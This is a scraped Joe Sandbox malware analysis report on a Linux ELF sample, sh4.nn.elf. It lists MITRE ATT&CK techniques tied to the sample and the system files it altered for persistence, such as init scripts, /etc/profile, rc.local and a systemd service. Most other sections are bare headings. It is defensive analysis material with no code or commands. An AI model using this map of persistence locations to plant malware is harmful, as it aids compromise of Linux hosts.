Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report sh4.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh4.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.7ouZ2A (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: dash PID: 6221, Parent PID: 4332

General

Chronological Activities

Analysis Process: rm PID: 6221, Parent PID: 4332

General

Chronological Activities

Analysis Process: dash PID: 6222, Parent PID: 4332

General

Chronological Activities

Analysis Process: rm PID: 6222, Parent PID: 4332

Linux Analysis Report
sh4.nn.elf